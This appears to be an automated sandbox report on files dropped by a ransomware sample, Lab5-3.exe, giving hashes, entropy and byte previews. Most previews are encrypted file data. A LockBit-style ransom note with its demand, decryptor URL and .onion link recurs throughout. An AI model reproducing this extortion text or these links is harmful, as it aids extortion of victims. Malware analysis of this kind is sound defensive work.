                                                                                                          Preview:....}.........E.}qn.....[..L.L...B...l.>X...=..g....0^Q..z..M..3Xrc_L..j..A.Y....-.'CV.:.....F..nq...]...Y.ER.[s.P...`tT..)...H....%.K.d. ......mG.. ...K.1N4..n.....K9.....H.b..W]u..\...o.. o.+#8..v.^M.....@>l....R...S..8.1...E=sn....d.E.......8fH.L......F..[.=O.".0.... (.r.[.t... ..8..H..".^kuwv...X..8D.@.kg..k.....&....Ve)..0..1]...m..g.F.'f%4t#.#...BQ.I..R.!.D.4..C..6GQ.w..........z..Ai........Ir...<u1...r..!.Y?.4..HP.a...G.....E<.l.V.......~.8".M.}^.%.*~1..d.....H.yE..r.N,.....k..2......$....Z..v.(.VD.E.3..x.I.;Yk.N%t.....+.....CD......~.........~.......A...0.Ul.._.Z.PP..X.(..+..>"r.P5sk...u].?K....;..O.[...._....(.?^.._).(....s.,D...F.._.O....'.Ab.....H.."..".4........k.b.(.f....:".V.m..0.<..l..n..x.b..HP.Cwb_>A3.o.,NR....i...x#.-3.._...I..>.L/e....)5.'.kw.*8..^:..Z....g...f.PHmm/.9..y.D....%..S..|..U.m..4.....8...&n.L.HL....D.F.(.>Re..a..4.../[.L1.....y.....u1...!.......%.I....].Y.9~...T.bJa...........Y..X.V..,.;y..#.5....".G.X.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):42400
                                                                                                          Entropy (8bit):7.995239050945668
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:5xD7SIcabyQTA7m6l4aZz5K6v49wQwHanKqqFGihQee0SNhAtDEXLvm49QtUwZ:DDK8TGm6ywyAa3qFGCQ/Ksjm49OZ
                                                                                                          MD5:371B8C09225545B78D6C699E02B8EB8D
                                                                                                          SHA1:057A75D6AB42BDD74EDB6ECD2D2CC4FAC041E3AD
                                                                                                          SHA-256:63589BA9404896B4DCB8A5B8F27F7B841E5B9469DB8D20D1B7260CDDD65F4046
                                                                                                          SHA-512:4B948F87890EEBB5CB2748A5967C90724AD5E5EDABEC600D4D7014C673664329228316CBBE26384464C0B921B7C7EDBD021C7B4A05628DC10A154B7D425865A7
                                                                                                          Malicious:false
                                                                                                          Preview:}J.....Na*c..{.R........[.@..U.z.[@.._./]hM./.w..m....,:..j..}.&.x2e...B...4!.{..7_1.\.u.a#....Q./.^q.`V7.2..!=H.0>..x.Tee.A........_.......e{.-...G...../.1".TUIo.0.eO..PYR....p.....T.^?....v......D.B....!........d...T.../.....Z.P*O'm..*.YPb..:..sG..ZW..8e.8TfB../.nu.R1.d..5..`...0`U.N...o.'..p%9....<.|.C...R.ys......jT.I..,.M..!..`eg.XZ........".I.;.D6..S.>J.-.1p9Ta.MK....k.....Bh..!..p.k.'_.f._...-...Z6...Z.`.?cx.H.[.>...z.f.}.(.0.V.....Y*o..ai....#h)..........g......0....?/?..t:).......HN.8.....N.JoD.....l#..`.{.Z..LbR..mOC.r?Z..o..u.f...+.P...cWC..GQ.R...L..n{..|..s....H.^.'.@..V......>j..{z.%..I.d%........M.!?........s...0ey..>..'j...D..`......~.45"UA.Q../+moB.M=Oe>.....?.6j...Y.o_.Lh...a.%..R..)a."S...O.#.[..L........i../.......Hq......+....62...0.)7f.|b .x.%..0?....k.1J.W^..=..Rw&.|.6.0C./...b[7..i...).....9.Mv.K......z.|......0.Q..R.:.J.Ri../Y.>...n<......_.../.B).......LY.l......*..f.WmP..Mp.V..R.bNmQ."-..$..zC.D....H..E.x......5
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):40480
                                                                                                          Entropy (8bit):7.995598049609091
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:X0GxnHhgrNQCbcVV9OUbtvHn1IXYahp10whvK02Z:k+BgrNmVwItfn12Yatz4Z
                                                                                                          MD5:710AF0710932BB03221BCB9E1F1CBDF9
                                                                                                          SHA1:A127924059C3621C63AFF654358E3405BC2B5C7A
                                                                                                          SHA-256:A05D2486576BDC842183BA54DF4364B226F14F654819BD91F8D4B8570AB5EFDD
                                                                                                          SHA-512:A67FC06339DB61BDBAE25B693D12764428019F3289C49821E09BCFB82D7B47332B402EC7696FEFE51CD4D281FBE79331CB4B4B1D0D2D54B466D465BC8153A7F6
                                                                                                          Malicious:false
                                                                                                          Preview:.......j0....4...0C...R.CLi....j../N$..F-v..........C....\J!%..9S.4P.>...y`..K.&.j}.....1v..g?h.E7@..k.b..&.V..PT$78U.W....z+l.t.N.....$`.ii..........?....f..Vo[.Z.2.LSO...X..N6..2. ..B=.'|.)......1jv ....5*....1k...$.@.?.$V~.fv.........*....%R..%.E...I.....!..b.$..2...u.6....F.. ...f....=.\........p...t..#h....W..}d..@%....Wp.zc*!.........,q+.>aG.!...1T9"...Awo........r.(...xD.Wf...m.J.>w(=....Q. WD..;....p..g.si5./.g.8J.`,..>.qo...(_7.....!..[5.g.....;.* .`+...../..$.ON:.(.A..s..-.8z.0....`.^....`,..0..J.>....wN..*.;1.p...'bp....B(K$...a_0..5.6......'.........ST....uI..q.g.FK;..+.H4.C".....S..A.......8.)....D...|.R.g.,...........m..:..w^5..]...c........}r.d|H..m..w.YEjRy.........K.hl.......S...........@M..U.j*.....:.b........l..tph.Hg5r...Z....{.2P.|.w...\P.|T.A...%......!<."/......!...A...Z*..HoNE...w.W...-g[.I.^..b..Z.;R.'..o.5n%.../...{...!.....:J.j58(.....D...R.....T.._1_..%.........s1P.d..v8....O..P.a...P.N..c..(....;.Z.!......>..K b....z.:...;|
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):39392
                                                                                                          Entropy (8bit):7.995918378833738
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:5eowxKyaV9HgQvp+JzLypSOAHdUeoulUXphGk447FyYZ:5eowx56gQizLypZJQU5kcfZ
                                                                                                          MD5:DA49B20E96136F721DAFC3BCE248B6D2
                                                                                                          SHA1:94944A9DF0A8166985C96679F92C3CEC06DBEFC0
                                                                                                          SHA-256:684CDFCB1781F8AB6DF78C9BE00DEB696F17172E5527312CC7AC6FA9DB3DDDB7
                                                                                                          SHA-512:DEA1BB3B7F8CA6D1585E0AAD2A21A315C2BB8E93C2219F795C21C88D620D063704562C99F4BFB38D6D47B9A3F86882622CD560BE06BCA72F31A34E0F2C10603B
                                                                                                          Malicious:true
                                                                                                          Preview:...{g....a......|......L..u.........S.=. 9kVG.FF.I.j.....nA.*.+:X.e....ek.........D....M).....>w......B.].wj..;.V&=h4Y2.......q.AC.?)9N...I......j...ud.t..\-g.v...: .k.NC...^...P,.5S._h.a....>..gt... %N....X.-.$./..Y...m..:q...Q.RL.r......$...B....v.3l....r....-ZH...R....l..).J.2..>.$.<...-@-..iy\G.pjf....8 ...;...T.6;........."....z'.{.eZp|....2&..#.5}....Zy.M%bM}J.w].........)oI...^/@..O.........1S1..k..\.....F[..q..k.2,6.4..&!.n[3.\.\...!)..RB.g.L......x.Y.<.|c....z0..wc....(M..../....3....,?.........F..c.>.y.t..}.l..Ow.\......m.OC..2..y..V{...U(..X.nN.(.A.5.r.1.p..~.....)....h9.hm.....6.......'hC:.(9.,.rbb..f..\......../..Td,.+.......o. .1..8.!EQ..Q...<..40.K..L8m...d(f.o..YQ.........h$z.*U.Z.*.$S..|T..DiXeZ.Q.E...LT.:..........hy.Qt\.f..L.7..R.............../.+.........'..Q0..........;............hJ..[..*y%l.....]}..f..]T..yo....O....3..3.;5=..._.2.......[.]...<k...i........]X..1...._...H.Ioe...ok.v.,.f.$s....0...d.<M..NU^...w.U>p......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):41872
                                                                                                          Entropy (8bit):7.996049452707739
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:4vpVioZetDPraA80lT7Qzp1B5vbzKjCcbfZ:4XioZetDPraA80lT7Qzp1/y5DZ
                                                                                                          MD5:2C17038607471D10A6E3325CFD5440EB
                                                                                                          SHA1:A32EDD6326CF979E5753180F085200ED6E58526C
                                                                                                          SHA-256:1D4F6B3CE262FF214CA055F6885BB16394921247E9212110F0FBE9DAD3D616D0
                                                                                                          SHA-512:19F0E09FA1B9F192AE0FD050B8AF4798B526935A98061BF63E2AD2FF2E2473E0CC1DA94D0ED84F20D2C903D70D17B0C72BDB3B95F16C6D6F6AD8034CE44E18B7
                                                                                                          Malicious:false
                                                                                                          Preview:..{..f...U<......0..'.^..~]c.....+S...."l....6@.........e=...d.|E.v...Z...{&..f....u....%.g..k~.....n.*.1..Q..bs.........."..lODV......Z.a..].2...N.PC,..J.f..$.z....KUZ;..K.ea.y.-.!.n...y.*.He....%G#. 6.{_...:.,.\GN.k.....D.....q.)1.W".."j..T_@...}S.iM.....=....!.<...W.....d3./xD............=..t>P[...a.....-.s8#P..?k ...c...^P.&&.......a.f.c...86...r.#&.......zB...^.."..4....q...C....q...7C$..kr..W=.B.D'q..k..[[[f..=....".|.).....\...7...'.@_$....>.Zg.6.i..V....m.$...~-.MK...:.$..N...r...wX....#..E=.Z...<..g.D..!...i...J.rbx...4...j...k...3K.]:y..$./S.. -`~w...G@I5..dk{.u+-.*.\.....F/C..'..R..-'`...7.qG.{...xIM..._.......e.z.@..s.....5.W.B..].6N....9Ok.&..L.k.8./.4..Z...0..#a.+O2...;.$8.m.k.Z...=...0...E....H...y..dz...TY..P)..dv...(.......p.3...(o;..........y.DC..@.R......a"XG`..t...._..|..D......W%(..*........1....~d7d.tN.%;...)C.._I.9.....A".@66\.}..*H...c....D...c.C...yt.........d......%..p.......x.......c.b..<....Z.S{-f....d.Z...m..F{$
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2832
                                                                                                          Entropy (8bit):7.931358908644396
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:aA498/OEa4yKBQ8k1BeFX67mQFhJSXHfUTid3hBaUoSGFcmeykEdEElU92i:NyizaPYQDI0CSjGx0uKeY2ElUJ
                                                                                                          MD5:6A51E44B00CFB203C7910FA88F270143
                                                                                                          SHA1:E9EC633AD8558C80AF65467199E5E992100ED812
                                                                                                          SHA-256:D3AFEB33764D316EC0531BE7136A637D667A90BD7C632F6F09A5050556E8F0D5
                                                                                                          SHA-512:9C4BE7D70862366ED7006F38095AB0D23BC222B16E389B9628383CA193CE333CB13EE1ECD300F2207CB2024E43D7B7DD64F9BC01F41B802C5B77E6DD1F2188BE
                                                                                                          Malicious:false
                                                                                                          Preview:.t.x..X.i.......E..^A]..2DHs@`...Q.....@7.#..".r..[M.bU..m.......,.p.......N.......Y..J.2fZYsV.....#..~.........k..y._.....M.....|...Au.OS.m....<.;jW..mf{..5..H.9|../.GlX18..L...E6...T@...y..6.P.p.2.?.](v...b<..:[\.'.Bc.#f.p.>;..\...G.A.*.&..,.....u..S.....Q.....'.,....6.us...&...Xb.b2...Dg.f.(.~..4PP.......q>\.../.|...u).c..L..=f\9....qo...g.B..yZ_..........5O..0....#...F.." >...-)..",kq..@.k)=G.3....*~..(......AnY<....[,.....X...UV.>_.M^..3UY......_d..T...0Zi....w.E.y.....m":..[XQ3..6(....w.s)..m.5.X..m.O!.)....;....7...<.7.....G....0...E.%7.~."....ey)[x....BJ..~a......1F.%.....&.D.......f.a..!Dt."\.. =Q.e.|mdr......u.O.gF..Z.......U........<,......Q.>........j..:?..U...k.<a..Bh..."As...`...%R....Q.9.....?.r.D.......Y.Yo.d..A..,v..*.3.....|<.e.R}.S.Y..j..;A..h....i........1'...>{.c...`......\..-..O...y..}.ke.)....{...S.W.p..".g.S.J...>.J.*i..s.x....K_G]^Q....z..Nq.?.`...{.9?N~...>Z{..:..|.X.......e...}{.0S.A.k...e...1..0..n
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):59200
                                                                                                          Entropy (8bit):7.997103951619919
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:h/fT693lnl+jWKIm3pXePuCoqRm4KjVeGWsuG98xyr7l1eEYqMaXp45xUIOp5fTG:dT6llnl+jWseoUKpequ1WR5MaVIWuVZ
                                                                                                          MD5:39D76D2070EB5C5EF1E08A76E78A175F
                                                                                                          SHA1:22E93DB912A544D10A27ED34D744C9DB500308B6
                                                                                                          SHA-256:2B778B24FD887E21BB62AEBE7754840E637930A9813D8B415BF08C16F83A30AD
                                                                                                          SHA-512:56595B32885C0C052F47561E8D66B997BD6B36FF3BB3B70CF13052D0D2104C8BDB986BCDB5CD5CED27391C4C9C4F0C1D767D791613C629380413952B11FE14DF
                                                                                                          Malicious:true
                                                                                                          Preview:...r;e.I3&...m^.......D.....z......O..<a*.36......Ql).D.KN...d.v..D...&;n....(..Yk.Z....Q..~D.~..Zr..Q....B.c.3T.|...1HIMN.yK..l...w.^..QwZ......z..~"Uu.G.{..i...8!.m.){z...!..2(...Ot.L@....B.O.).......[.....$A.K."......3...Q.n.a.m...m9o....%1.&..l.....].....6...#....z.......9.'"....$.mG....L...j.".......GF...E...#.....6. `Q*.+}L...d.g/..C.n.=6.i~B.9.O..*.}..l..|..;i...X...........f..B.pd{1O7..(.>f.t..w-w..r.!./c..r.(P-Ho.5..rW....].i.....F.U.l.....H.[.....).s.~.B.'..<ST.>.'(...O$.r..P..(v.........2.s S.P.%4,`.=........}.....&.jo......z.i........9_..2..K.6..j ..nW......+1k.I..n.gm.".y....5....U`.2..{Wu-."e..,..K.q...H...lc<J...iS....,.t.C....s7%.W...3............2.`.....]..n..C.Q..-E..-...)...9.s.. .c.D...C.t...MB..k.@............[....L{..^...=.....m.Dz....,Xw-....'.;b#=P;M=....D../...r.`...M.p[..^!.=......J.#..0.G........M.u...;%'O..:.4.^>....#ca......5.bR...w..@..50.5pe.im.wE...cz.}j...a..07.....as$.k..6...A..&.C=....W......F.DA
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):37104
                                                                                                          Entropy (8bit):7.995424177556155
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:Uc0uoQqbXSDWAiNDmRUpdCIOGWkaE+ghp098wUbHmshQ/E80j5CcJ2gZ:UcHorX4iNKKdCAlt+ghpdbGepN4cJ2gZ
                                                                                                          MD5:081255776D7906CA10B0ECFDF825946B
                                                                                                          SHA1:A377766932320015874DEFD658DE46B632259DA9
                                                                                                          SHA-256:46F00AA56E4A00CE8654F2468D8CE3187379938A0C1D19C2A3570C5988E8A585
                                                                                                          SHA-512:37ABC519EAA90F3908775DDD118A130EA7610798AF1C4145287DB6919783E407664D5BBAB0B10007FAF74A44D2BE8AF9C543CD7F071B175402AEB82DCA023B7D
                                                                                                          Malicious:true
                                                                                                          Preview:..)..e.........e..c,..x.<.J..9..G.y%.d..}.....Y.y....?.ud...4..)h.....,.;B.A.`.:q!.)j.0z..z.?.G_.P.Fz.H/...D@.f.[...a.K.]~.%!....7t...7.(...ZX,....N.....EM....fu..Xy.(....5...l.P.".U..Eo,.+......X..`.9.]..<.g..g<.>.E4f.GGFP..X?.^...-...*b.fOY.....?... .L....z.......k..r..G..N...H/.]...,bI.....k`.;=}t..y.7.T*G..........?.._..Qb........9.8\F..8..r..1~_.....sC_Y.\O0R....y.Hx.._...I>.....ihf.T8B..\.........bt..S...}n..dy.v..f........UD.....k..My.....EH.C........N.....a.f..:._...s...P.....J.k...M...W..5..h..v.f.{....~.C.(...f.}.....~...Gh...!N..h....t......V...?}e-...F....}.7a.5.0]B:*..y..f.f'...x.5..r...n.K..:.$........+V2l.G9.........(%..p.{..........:x..P.O.........U.(]......... ...-k..&.O.2Ya..V\8....?S..@D...U...a.C...... =..2K.4.@..M3A.Z.....C..\<|..E}........?.F.D..p.C]..8.6.....3.#..A&......sQv.@...Qi..A.......B..[......N..a..LW..w...&V.q.1..K.6.h.\J?.d.Z...k.1I..Pi...C...g*.l...z7....x.UZ.v...l.8..E~;iJ.!7f.LgW....P1\^.._V...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):37024
                                                                                                          Entropy (8bit):7.995240730610502
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:Dyw+uZ1AhwBuzFPivFSmZR0e5hX5yr65d/i1yxYBnttW3v97olZ:DywNZ1rBud6omZR0eb5yrkmn3W/9clZ
                                                                                                          MD5:D70A2D2EDFB68A5C6E762AE2C478434B
                                                                                                          SHA1:4B07A4F799B965F2671BBEBCA728CB233EF55C0C
                                                                                                          SHA-256:6457CC305A0527C8F7E47BA49D27559917CA0467F18B782170DE7E22E2E69EFD
                                                                                                          SHA-512:366F98FF1EFEACAB4D357392764ACAA59333722120BAB6735384636C07F954B6E06CBA62CE1A37673E3715EFA86731519E39C2BFAC081C723AB4D49BECDAE9D7
                                                                                                          Malicious:true
